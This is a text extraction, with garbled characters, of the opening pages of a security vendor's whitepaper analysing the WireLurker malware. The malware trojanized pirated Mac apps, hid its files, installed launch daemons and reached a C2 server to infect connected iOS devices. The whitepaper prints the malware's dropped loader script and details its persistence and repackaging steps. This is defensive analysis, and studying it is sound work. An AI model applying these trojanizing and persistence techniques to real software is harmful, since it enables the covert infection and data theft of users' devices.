No information is available for this page.
Learn why
Missing: découvert | Must include: découvert

271 KB – 32 Pages

PAGE – 2 ============
Executive Summary 3 Background 4User Reporting for this Threat 4 Investigation of the Third Party App Store 5WireLurker Work˜ow and Malware Progression 6 WireLurker Versions 7 Analysis of WireLurker OS X Malware 9 Bundle Repackaging and File Hiding 9 Self Update 11 Persistence Mechanisms 13 C2 Server Communication 14 iOS Application Download 15 USB Connection Monitoring 17 Ex˜ltration of Device Information 17 Installation of Malicious Dynamic Library to an iOS Device 18 Backup of Speci˜c Installed Applications from an iOS Device 19 Trojanizing iOS Applications 20 Installation of Trojanized iOS Applications 20 Analysis of WireLurker iOS Malware 22 Code Injection into System Applications 22 Self Update 23 Ex˜ltration of User Data 24 Ex˜ltration of Application Usage and Device Serial Number Information 25 Overall Threat Analysis 26 Use of Repackaging to Trojanize Applications 26 Malicious Use of USB Connections 26Attacks Against Jailbroken Devices 26 Attacks Against Non-Jailbroken Devices 26 Actor Motivation 27 Prevention, Detection, Containment and Remediation 27 Prevention 27 Detection and Containment 28Remediation 29 Acknowledgements 29 Appendix 30SHA-1 Hashes of WireLurker Related Files 30 URLs for C2 Communication 31 Version C Encrypted C2 Communication Code 32

PAGE – 3 ============
PALO ALTO NETWORKS + WireLurker ŠApple OS X and iOS malware 3Executive Summary Palo Alto Networks ® recently discovered a new family of Apple OS X and iOS malware, which we have named WireLurker. We believe that this malware family heralds a new era in malware across Apple™s desktop and mobile platforms based on the following characteristics: Ł Of known malware families distributed through trojanized / repackaged OS X applications, the biggest in scale we have ever seen Ł Only the second known malware family that attacks iOS devices through OS X via USBŁ First malware to automate generation of malicious iOS applications, through binary ˜le replacement Ł First known malware that can infect installed iOS applications similar to a traditional virus Ł First in-the-wild malware to install third-party applications on non-jailbroken iOS devices through enterprise provisioning WireLurker was used to trojanize 467 OS X applications on the Maiyadi App Store, a third-party Mac application store in China. In the past six months, these 467 infected applications were downloaded over 356,104 times and may have impacted hundreds of thousands of users. WireLurker monitors any iOS device connected via USB with an infected OS X computer and installs downloaded third-party applications or automatically generated malicious applications onto the device, regardless of whether it is jailbroken. This is the reason we call it fiwire lurkerfl. Researchers have demonstrated similar methods to attack non-jailbroken devices before; however, this malware combines a number of techniques to successfully realize a new breed of threat to all iOS devices. WireLurker exhibits complex code structure, multiple component versions, ˜le hiding, code obfuscation and customized encryption to thwart anti-reversing. In this whitepaper, we explain how WireLurker is delivered, the details of its malware progression, and speci˜cs on its operation. We further describe WireLurker™s potential impact; methods to prevent, detect, contain and remediate the threat; and Palo Alto Networks enterprise security platform protections in place to counter associated risk. WireLurker is capable of stealing a variety of information from the mobile devices it infects and regularly requests updates from the attackers command and control server. This malware is under active development and its creator™s ultimate goal is not yet clear.

PAGE – 4 ============
PALO ALTO NETWORKS + WireLurker ŠApple OS X and iOS malware 4Background User Reporting for this Threat , a developer at Tencent, initially observed WireLurker on June 1, 2014, when he found highly suspicious ˜les and processes on his Mac and iPhone (Figure 1). Nine days later, a thread was created on a Chinese developer forum by the user fiLeoHefl, describing anomalous ˜ndings on his iPhone. A similar thread was created on a Chinese Apple fan forum on August 9, 2014. In these forum threads, numerous users reported the installation of strange applications and the creation of enterprise provisioning pro˜les on their non-jailbroken iPhones and iPads (Figure 2). They also mentioned launch daemons found on their Mac computers, with names like fimachook_damonfl and fiWatchProcfl. Some of these same users stated that they recently downloaded and installed applications from the Maiyadi App Store ( ), a third party OS X and iOS application store in China. As background, the Maiyadi site is a Chinese portal for Apple related news and resources. The Maiyadi App Store is a sub-site known to host pirated premium Mac, iPhone, and iPad applications. FIGURE 1 + Report of strange apps appearing on a non-jailbroken iPhone FIGURE 2 + Additional developer forum discussion regarding anomalous ˜ndings

PAGE – 5 ============
PALO ALTO NETWORKS + WireLurker ŠApple OS X and iOS malware 5Investigation of the Third Party App Store Some forum users speci˜cally mentioned downloading a Mac application named fiCleanAppfl (Figure 3) from the Maiyadi App Store and suspected it might be a culprit. In fact, our investigation revealed that almost all of the Mac applications (totaling 467) uploaded to the Maiyadi App Store from April 30, 2014, to June 11, 2014, were trojanized/repackaged with WireLurker. These impacted applications were downloaded 356,104 times, as of October 16, 2014. Table 1 lists the top 10 WireLurker applications, ordered by number of downloads. FIGURE 3 + One of applications in the Maiyadi App Store infected with WireLurker TABLE 1 + Top 10 WireLurker downloads from the Maiyadi App Store (as of Oct 10, 2014) WIRELURKER INFECTED APPLICATION NUMBER OF DOWNLOADS The Sims 3 42,110 International Snooker 2012 22,353Pro Evolution Soccer 2014 20,800 Bejeweled 3 19,016 Angry Birds 14,009 Spider 312,745 NBA 2K13 11,113 GRID10,820 Battle˜eld: Bad Company 2 8,065Two Worlds II Game of the Year Edition 6,451

PAGE – 6 ============
PALO ALTO NETWORKS + WireLurker ŠApple OS X and iOS malware 6All of the WireLurker trojanized applications included an installation interface that used fiPirates of the Caribbeanfl themed wallpaper (Figure 4). A fi fl seal and QQ account number were also displayed, both of which correspond to the owner of the Maiyadi site. Another similarity between these installers was that their packages always contained an application named fi fl (fiUser Manualfl, in English). These trojanized applications were hosted on two cloud storage websites, Huawei and Baidu, instead of on Maiyadi™s servers. This section summarizes WireLurker™s work˚ow and malware progression (Figure 5), which are described in further detail in subsequent sections. FIGURE 4 + Installation interface of WireLurker infected applications FIGURE 5 + WireLurker™s work˚ow and malware progression WireLurker Work˜ow and Malware Progression

PAGE – 8 ============
PALO ALTO NETWORKS + WireLurker ŠApple OS X and iOS malware 8Examination of the differences between these three versions of code demonstrates progressive re˜nement: Ł Version A neither downloads nor installs iOS applications to connected devices and communicated with the C2 server in the clear (plaintext). Ł Version B downloads and installs iOS applications, but only for jailbroken devices; it also communicated with its C2 server in the clear. Ł Version C downloads and installs iOS applications for both jailbroken and non-jailbroken devices, and incorporated a custom encryption protocol for its C2 server communication. Another signi˜cant difference between versions is found in associated malicious ˜lenames, paths and their content. WireLurker consists of dozens of malicious ˜les that can be grouped into the following categories: Ł Original malicious samples which were used to trojanize Mac applications Ł Dropped malicious executable ˜les and con˜guration ˜les Ł Downloaded update packages from the C2 server Ł Locally generated database and log ˜les Ł Downloaded IPA format iOS applications Ł Malicious iOS executable ˜les Ł Malicious iOS dynamic library ˜les The ˜lenames and SHA-1 hashes for all associated ˜les can be found in the Appendix of this whitepaper. FIGURE 6 + WireLurker version information embedded in a URL found in binary TABLE 2 shows how these categories of ˜les changed between versions FILES GROUP VERSION A TO B VERSION B TO C Original samples No changes.No changes.Dropped ˜les Path and content changes. Path and content changes. Downloaded updates Unknown. Downloaded a shell script with a packed executable ˜le. Generated ˜les Path and ˜lename changes. Path and ˜lename changes. Downloaded IPAs Downloaded a game and a third- party app store client. Downloaded a normal app. Malicious iOS executables New feature. Path changed and content slightly changed.Malicious iOS dynlibsNo changes.Path and ˜lename changes.

PAGE – 9 ============
PALO ALTO NETWORKS + WireLurker ŠApple OS X and iOS malware 9Analysis of WireLurker OS X Malware Bundle Repackaging and File Hiding Every OS X application is comprised of a bundle that contains an executable as its main entry. WireLurker trojanizes OS X applications using three ˜les: a loader, shell script and ZIP archive. The ˜rst step WireLurker takes is to append an underscore to the original bundle executable name and then copy its malicious loader into the bundle to replace the original executable. As an example, given an OS X bundle with an executable name of fiContents/MacOS/CleanAppfl, WireLurker would move the original ˜le to fiContents/MacOS/CleanApp_fl and then copy the malicious loader to fiContents/MacOS/CleanAppfl. After executable replacement, WireLurker then adds a shell script, fistart.shfl, and a ZIP archive, fiFontMap1.cfgfl, to the fiContents/ Resourcesfl folder of the bundle. The fihiddenfl ˚ag is then set for these four ˜les. This ˚ag is an Apple speci˜ed ˜le property de˜ned at fi/usr/include/sys/stat.hfl as fiUF_HIDDENfl. With this ˚ag set, a standard user won™t see the ˜les in the Finder, but can still view them through the Terminal (Figure 7). FIGURE 7 + WireLurker hidden ˜les within an application bundle

PAGE – 10 ============
PALO ALTO NETWORKS + WireLurker ŠApple OS X and iOS malware 10These operations trojanize the original application through repackaging. After the bundle is trojanized, the malicious loader is executed when the application is run. The loader ˜rst drops an embedded script ˜le to fi/Users/Shared/run.shfl, with the following content: The text fi%@fl is replaced by the full path to the application™s bundle executable prior to being dropped. This effectively backs up the loader, restores the original bundle executable, runs it, restores the loader, and deletes the script itself. It also sets the fihiddenfl ˚ag again for the loader and the original bundle executable. After dropping the above script, the loader determines whether this is the ˜rst time it has been run by looking for the fi/usr/local/machook/machookfl ˜le. If that ˜le doesn™t exist, it performs the following actions: Ł Copies the fi/Resources/start.shfl and fi/Resources/FontMap1.cfgfl ˜les to the fi/Users/Shared/fl folder on the Mac Ł Requests system administrator privileges Ł Executes fi/Users/Shared/start.shfl with administrator privileges The fistart.shfl script: Ł Decompresses the fiFontMap1.cfgfl ZIP archive to a new folder, fi/usr/local/ machook/fl Ł Copies decompressed and globalupdate.plistfl ˜les to the fi/Library/LaunchDaemons/fl folder to register them as system launch daemons Ł Launches these two daemons using the launchctl command Ł Copies a decompressed figlobalupdatefl ˜le to the fi/usr/bin/fl folder Then, the loader collects the hardware serial number for the Mac and uploads it to the C2 server, www[.] (Figure 8). #!/bin/sh/bin/cp -rf ‚%@™ ‚%@2™ /bin/cp -rf ‚%@_™ ‚%@™ && /usr/bin/open -a ‚%@‚ sleep 5 /bin/cp -rf ‚%@2™ ‚%@‚ rm -rf ‚%@2™ FIGURE 8 + WireLurker uploading the hardware serial number for an OS X victim machine

PAGE – 11 ============
PALO ALTO NETWORKS + WireLurker ŠApple OS X and iOS malware 11Self Update In WireLurker version A, the dropped figlobalupdatefl ˜le will be executed as a launch daemon and periodically check its C2 server for a new version, using the following GET request: http://www[.] A packet capture of this communication is shown in Figure 9. A sample C2 server response follows: When the fiversionfl ˜eld returns a non-zero value, WireLurker downloads the ZIP archive speci˜ed in the fiurlfl ˜eld, decompresses that archive to fi/usr/local/machook/ update/fl, and executes the enclosed fistart.shfl script. WireLurker version B uses a different C2 server request to check for updates: http://www[.] In this version, the HTTP response body contains plaintext for the fistart.shfl script to execute, and the temporary folder from which it runs is set to fi/tmp/upfl. When we began analysis of WireLurker, its update package contained version C. The fistart.shfl script for this version executed a newly added fiupdatefl binary, which: Ł Drops numerous new binary executable and .plist ˜les onto the system Ł Loads newly dropped .plist ˜les as launch daemons (e.g., MailServiceAgentHelper.plist) Ł Deletes executable and .plist ˜les of previous versions Ł Unloads old launch daemons FIGURE 9 + Packet capture of WireLurker version update communication with C2 server

271 KB – 32 Pages